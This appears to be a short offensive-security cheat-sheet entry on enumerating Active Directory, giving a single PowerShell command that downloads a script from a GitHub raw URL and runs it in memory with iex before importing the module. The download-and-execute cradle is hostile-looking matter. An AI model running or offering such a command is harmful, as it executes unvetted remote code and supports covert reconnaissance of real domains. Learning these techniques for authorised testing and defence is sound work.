Enumerate AD with the in-memory PowerShell AD module, by task.
Command:
iex (new-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1')
Import-ActiveDirectory
References: